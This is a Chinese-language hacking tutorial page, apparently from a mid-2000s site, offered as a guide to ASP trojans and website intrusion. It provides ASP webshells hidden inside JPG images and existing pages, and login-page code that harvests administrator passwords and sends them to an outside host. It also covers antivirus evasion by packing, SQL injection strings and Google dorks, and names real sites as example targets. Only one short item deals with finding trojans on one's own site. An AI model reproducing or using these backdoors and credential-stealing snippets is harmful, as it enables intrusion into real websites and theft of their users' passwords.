讓你變成ASP木馬高手
1.名稱:如何制作圖片ASP木馬 (可顯示圖片)
建一個(gè)asp文件,內(nèi)容為<!--#i nclude file="ating.jpg"-->
找一個(gè)正常圖片ating.jpg,插入一句話木馬(比如冰狐的),用ultraedit進(jìn)行hex編譯,插入圖片里,為
了運(yùn)行成功,還要搜索<%和%>,將其變?yōu)?0,(不要替換自己asp的),再把jpg文件開(kāi)頭加入
<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#)+) </SCRIPT>
2. 名稱:整蠱網(wǎng)吧
先用精銳網(wǎng)吧輔助工具得到用戶名和密碼,然后用計(jì)算機(jī)管理聯(lián)結(jié)一臺(tái)機(jī)器,開(kāi)telnet,連接,開(kāi)共享,
復(fù)制一個(gè)木馬過(guò)去運(yùn)行即可。
3.名稱:感受MD5的魅力
rainbowcrack用法先用rtgen生成庫(kù) "rtgen md5 byte 1 7 5 2400 40000 all"
1和7代表密碼最小和最大長(zhǎng)度
阿汀我再加個(gè)方法:http://md5.rednoize.com/ 在線破解
或者到http://www.md5lookup.com/?category=01-3&;searck=on
4.很多時(shí)候我們做免殺木馬,不用懂匯編,用北斗加殼程序就能逃殺,還有很多加殼軟件,大家木馬加殼
的時(shí)候最好多選擇不知名的加殼軟件
5.名稱:隱蔽的插入型ASP木馬
(1)在我們要做手腳的asp文件里加入如下內(nèi)容
<%if request("action")="ok" then%>
shell代碼插在這里,最好是小馬,還要加密一下
<%end if%>
訪問(wèn)的時(shí)候在你作手腳的asp文件后面加上?action=ok,即可
(2)另一種方法,在我們要做手腳的asp文件里加入如下內(nèi)容
<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),2
%>
訪問(wèn)的時(shí)候在做手腳的asp文件后面加上?filer=XXX
XXX為你本地上傳的一個(gè)路徑如 c:ating123.asp
上傳后在做手腳的asp的同文件夾中有ating,asp
(3)前提得到system權(quán)限,
進(jìn)入網(wǎng)站目錄下一層
mkdir s…
copy ating.asp s…/
這樣殺毒軟件找不到的
訪問(wèn)http://網(wǎng)站/s…/ating.asp即可
6. 工具h(yuǎn)ttp://hack520.tengyi.cn/chaojiyonghu.rar,此工具在該電腦生成一個(gè)超級(jí)用戶 用戶名為:
hack 密碼110,在DOS下和計(jì)算機(jī)管理器上看不到你建立的用戶,并且是刪除不掉的
7.名稱:QQ群腳本攻擊
打開(kāi)qq對(duì)話誆,復(fù)制消息,然后
下面的內(nèi)容保存為.vbs 文件,運(yùn)行即可
Set WshShell= WScript.createobject("WScript.Shell")
WshShell.AppActivate "QQ信息攻擊腳本"
for i=1 to 20
WScript.Sleep 1000
WshShell.SendKeys"^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next
8.搜索:程序制作:萬(wàn)鵬 有免費(fèi)申請(qǐng)空間的,直接上傳asp馬即可
9. 名稱:全面找出你站上的ASP木馬
(1) 用殺毒軟件
(2) 用FTP客戶端軟件,點(diǎn)"工具"->"比較文件夾"
(3) 用asplist2.0.asp上傳到站點(diǎn)空間查看,一般功能多的ASP我估計(jì)就是ASP木馬
(4) 用工具Beyond Compare
10名稱:拓展思路拿DVBBS帳號(hào) "一個(gè)人的圣經(jīng)"的動(dòng)畫(huà)
(1)以前獲得webshell后想進(jìn)入DVBBS的后臺(tái),想要管理員的密碼,可以這樣
老辦法:
修改admin_login.asp得到明文DVBBS后臺(tái)密碼
在"username=trim(replace(request("username")這行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.createObject("Scripting.FileSystemObject")
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理員登陸后臺(tái),在目錄下就生成了laner.txt
(2)login.asp中Case "login_chk"下:
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
這樣laner.asp將獲得全部登陸人的登陸時(shí)間,用戶名和密碼
(3)如果你有自己的網(wǎng)站或者另外的webshell(強(qiáng)烈建議使用):
可以建立目錄laner,在里面建立一個(gè)空的laner.asp和如下代碼的rain.asp:
<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
end if%>
11. 名稱:利用QQ在線狀態(tài)抓鴿子肉雞
生成qq在線狀態(tài),把里面的地址改成木馬地址,發(fā)到論壇
在login.asp那里插入一句:
response.write"<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n="&request("username")
&""&"&p="&request("password")&"></script>"
response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request("username")
&""&"&p="&request("password")&"></iframe>"
結(jié)果所有登陸人都會(huì)乖乖的把名字和密碼送到你的laner.asp 里
12. 動(dòng)畫(huà)名稱:媒體中國(guó)整站程序存在多處漏洞
漏洞程序:媒體中國(guó)整站程序(第一版)
官方網(wǎng)站:http://meiti.elgod.com/
漏洞: %5c(暴庫(kù)) 上傳 注入
上傳頁(yè)面:down1/upload.asp
13. 名稱:免費(fèi)電話+MSH命令行工具
http://www.globe7.com/ 打開(kāi)主頁(yè),點(diǎn)擊坐下角,F(xiàn)ree DownLoad,下載到本地,安裝,
運(yùn)行后,會(huì)提示正在尋找你所在地區(qū)的區(qū)號(hào)。由于是國(guó)際長(zhǎng)途,注冊(cè)一個(gè)帳號(hào),送100美分,國(guó)內(nèi)計(jì)時(shí)
0.01/分,你就有100分鐘可以白打。是一個(gè)帳號(hào)哦。
要注意的就是,固定電話,小靈通 形式為0086521123456 521本來(lái)時(shí)0521,要省略前面的零,手機(jī)號(hào)也
是一樣。
14. 名稱:Bo-Blog的新漏洞
http://網(wǎng)址/index.php?job=../admin/ban
把其中"禁止搜索的詞"那部分<table>另存出來(lái),里面的地址改完整,插入一句話木馬
16. 程序: 宏達(dá)企業(yè)整站上傳漏洞
官方主頁(yè):http://www.mu126.com/
漏洞頁(yè)面:/cx/upfile.asp (上傳漏洞)
17.無(wú)間盜郵箱,在修改密碼里,用戶名和密碼里添or=or
18.名稱: bbsxp5.16后臺(tái)得到webshell
bbsxp5.16過(guò)濾了 asp,asp,cdx,cer,擴(kuò)展名的文件上傳,就是在基本設(shè)置上添加上上傳類(lèi)型也不行,并禁
止了修改數(shù)據(jù)備份數(shù)據(jù)名稱,我們可以把此網(wǎng)頁(yè)保存在本地,改源代碼上傳。
19.名稱:JHACKJ 2005年最新精典教程
下載看看吧,不錯(cuò),各大網(wǎng)站都有
20.名稱:省力入侵韓國(guó)肉雞
在啊D的掃描注入點(diǎn)項(xiàng),打開(kāi)這個(gè):http://www.google.co.kr/advanced_search?hl=zh-CN
這是高級(jí)搜索項(xiàng),關(guān)鍵字隨便寫(xiě)。這里我寫(xiě)asp?name= 設(shè)置為每頁(yè)顯示100條。
語(yǔ)種選擇韓文。搜索,很多sa.
21.名稱:任何網(wǎng)吧的管理系統(tǒng)破解
選智能ABC,然后vv輸入,光標(biāo)后退兩步,按delete鍵 剛輸入的兩個(gè)vv刪除
最后按Inter鍵
22.名稱:破解QQ空間插入網(wǎng)頁(yè)木馬的代碼
現(xiàn)在騰訊 已經(jīng)封了很多QQ空間代碼了 就如 以前 <iframe src="木馬地址" name="lcx" width="0"
height="0" frameborder="0"></iframe>插入網(wǎng)頁(yè)木馬的代碼也早被封了
突破禁用的方法 代碼如下:
<div id=DI><img src="javascript :DI.innerHTML=\<iframe src=木馬地址 width=190 height=190
marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></iframe>\"
style=display:none></div>
最后附上 卡拉是條ok 總結(jié)的
1.上傳漏洞[不多講]
pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)"請(qǐng)登陸后使用",80%就有漏洞了!
有時(shí)上傳不一定會(huì)成功,這是因?yàn)镃ookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
2.注入漏洞[不多講]
pS:對(duì)MD5密碼.有時(shí)我們不是哪么容易跑出來(lái).如果是[SQL數(shù)據(jù)庫(kù)].那么我們可以用以下命令:
http://注入網(wǎng)址;update admin set password=\新MD5密碼\ where password=\舊MD5密碼\--
[admin為表名.]
3.旁注,也就是跨站.
我們?nèi)肭帜痴緯r(shí)可能這個(gè)站堅(jiān)固的無(wú)懈可擊,我們可以找下和這個(gè)站同一服務(wù)器的站點(diǎn),然后在利用這個(gè)
站點(diǎn)用提權(quán),嗅探等方法來(lái)入侵我們 要入侵的站點(diǎn)。,在這里有個(gè)難點(diǎn),就是一些服務(wù)器的絕對(duì)路徑經(jīng)
過(guò)加密,這就看我們的本事了
4.暴庫(kù):把二級(jí)目錄中間的/換成%5c
EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=職責(zé)范圍&BigClassType=1
如果你能看到:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一個(gè)有效的路徑。 確定路
徑名稱拼寫(xiě)是否正確,以及是否 連接到文件存放的服務(wù)器。
這樣的就是數(shù)據(jù)庫(kù)了。下載時(shí)用FLASHGET換成.MDB格式的就行.
5.\or\=\or\這是一個(gè)可以連接SQL的語(yǔ)名句.可以直接進(jìn)入后臺(tái)。我收集了一下。類(lèi)似的還有:
\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a
6.社會(huì)工程學(xué)。這個(gè)我們都知道吧。就是猜解。
EY:http://www.neu.edu.cn/waishi/admin
admin waishi
7.寫(xiě)入ASP格式數(shù)據(jù)庫(kù)。就是一句話木馬[<%execute request("value")%> ],常用在留言本.
EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[這個(gè)就是ASP格式的數(shù)據(jù)庫(kù)],再寫(xiě)入一句話
木馬
8.源碼利用:一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長(zhǎng)很菜.什么也不改.
EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
這個(gè)站用的是:杰出校友錄,源碼我下過(guò)了,
默認(rèn)數(shù)據(jù)庫(kù)/webshell路徑:databaseliangu_data.mdb 后臺(tái)管理:adm_login.asp 密碼及用戶名都是
admin
9.默認(rèn)數(shù)據(jù)庫(kù)/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的WEBSHELL.
/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
工具:網(wǎng)站獵手 挖掘雞
EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
10.查看目錄法:人一些網(wǎng)站可以斷開(kāi)目錄,可以方問(wèn)目錄。
EY:http://www.ujs168.com/shop/admin/
http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
這樣我們可以找到數(shù)據(jù)庫(kù),下載不用我教吧
11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[這種方法可以取得大量的WEBSHELL]
12.搜索引擎利用:
(1).inurl:flasher_list.asp 默認(rèn)數(shù)據(jù)庫(kù):database/flash.mdb 后臺(tái)/manager/
(2).找網(wǎng)站的管理后臺(tái)地址:
site:xxxx.comintext:管理
site:xxxx.comintitle:管理 <關(guān)鍵字很多,自已找>
site:xxxx.cominurl:login
(3).查找access的數(shù)據(jù)庫(kù),mssql、mysql的連接文件
allinurl:bbsdata
filetype:mdbinurl:database
filetype:incconn
inurl:datafiletype:mdb
我主不做了。。自已做做吧。。
13.COOKIE欺騙:把自己的ID修改成管理員的,MD5密碼也修改成他的,用桂林老兵工具可以修改COOKIE。
這個(gè)我就不多講了
14.利用常見(jiàn)的漏洞:如動(dòng)網(wǎng)BBS
EY:http://js1011.com/bbs/index.asp
可以先用:dvbbs權(quán)限提升工具,使自已成為前臺(tái)管理員。
THEN,運(yùn)用:動(dòng)網(wǎng)固頂貼工具,找個(gè)固頂貼,再取得COOKIES,這個(gè)要你自已做。我們可以用WSockExpert
取得Cookies/NC包
這個(gè)我就不做了,網(wǎng)上教程多的是,自已下個(gè)看看。
工具:dvbbs權(quán)限提升工具 動(dòng)網(wǎng)固頂貼工具
15.還有一些老漏洞。如IIS3,4的查看源碼,5的delete
CGI,PHP的一些老洞,我就不說(shuō)了啊。。太老了。沒(méi)有什么大用途。
相關(guān)文章
ART OF WEB-SQL-INJECTION第2卷 ORACLE篇
在國(guó)外對(duì)ORACLE的攻擊一直很收關(guān)注,只是國(guó)內(nèi)研究的人不太多,或者技術(shù)不夠~這里我就打響第一炮吧2007-10-10如何防止QQ被盜密碼 比較詳細(xì)找回qq號(hào)的方法
今天小編教大家如何更高幾率的找回QQ密碼,需要的朋友可以參考一下2008-02-02PHP 5.2.3 tidy擴(kuò)展本地溢出漏洞利用代碼
PHP 5.2.3 tidy擴(kuò)展本地溢出漏洞利用代碼...2007-10-10變態(tài)入侵之有史以來(lái)最酷的Windows后門(mén)sethc.exe
變態(tài)入侵之有史以來(lái)最酷的Windows后門(mén)sethc.exe...2007-11-11